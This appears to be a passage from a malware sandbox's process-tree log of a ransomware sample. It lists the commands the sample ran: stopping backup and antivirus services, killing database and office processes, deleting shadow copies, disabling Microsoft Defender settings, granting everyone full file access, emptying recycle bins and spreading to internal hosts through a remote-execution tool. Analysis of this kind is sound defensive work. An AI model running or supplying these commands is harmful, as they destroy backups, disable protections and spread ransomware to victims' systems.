    PID:4388
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:5804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:4792
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Z$
    3⤵
    PID:5228
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:6060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:5332
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:4708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:4264
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:6088
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5464
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:6080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:4924
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:4776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:944
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:4548
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:612
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:5940
- - C:\Windows\system32\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:4484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:4572
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:4996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:4836
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5864
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:6008
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Users
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4476
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4848
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5384
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:5268
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:4208
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:1752
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5708
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:6068
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5000
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:4948
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:1332
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.39 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:1972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:4856
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    PID:4296
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.21 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:4620
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:4940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4932
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.41 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:2808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:5800
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:5052
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.24 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:4464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    PID:2756
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:5468
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:4900
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:2140
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:2264
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:4376
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:5332
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:4264
- - C:\Windows\TEMP\kyiwrlef.exe
    "C:\Windows\TEMP\kyiwrlef.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5492
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    PID:4988
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:5956
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:5968
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:4548
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:5628
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:5936
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:2320
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    PID:5328
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    PID:6120
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    PID:4544
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:5188
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:2044
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:2256
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:296
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:5636
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:5060
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:5808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    PID:1740
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:4540
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5748
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:2292
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5924
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:5416
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.15\Users
    3⤵
    PID:2328
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5348
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    PID:5500
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:1972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:2584
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6016
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3432
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5716
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.18\Users
    3⤵
    PID:4356
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.21\Users
    3⤵
    PID:5512
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.24\Users
    3⤵
    PID:6136
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.27\Users
    3⤵
    PID:6072
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.30\Users
    3⤵
    PID:4748

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:4156

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:5320

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:5940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:6096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:6036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:5192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:4392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:5340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:4212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:4620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:5052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:5488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:5336

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:5652

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:5592
- C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
  "714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:4100
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:4820
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:4428
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:5616
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:3988
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:4724
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:276
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:5188
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:5628
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:2808
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:4412
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:5764
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4612
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:1236
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:4940
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:5728
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:5860
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:196
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:4672
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:4244
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    PID:4572
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:4560
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:5080
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:6008
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:4184
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    PID:4552
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5492
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:2264
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1736
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    PID:2224
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5048
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:5748
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4224
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4744
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2584
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4456

C:\Windows\PAExec-4892-RJMQBVDN.exe
C:\Windows\PAExec-4892-RJMQBVDN.exe -service
1⤵
PID:4444
- C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:4700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:3964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:2832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:4384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:5908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:4196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:5956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:5168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:5856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:5060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:1176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:5796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:4756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5044
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:4272
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:5300
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:1172
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:3552
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:3100
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:1404
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:252
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:3396
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:944
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:5488
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:3592
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:6060
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:636
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:4500
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:6120
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:4576
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:6116
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:4348
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:4740
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:3820
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
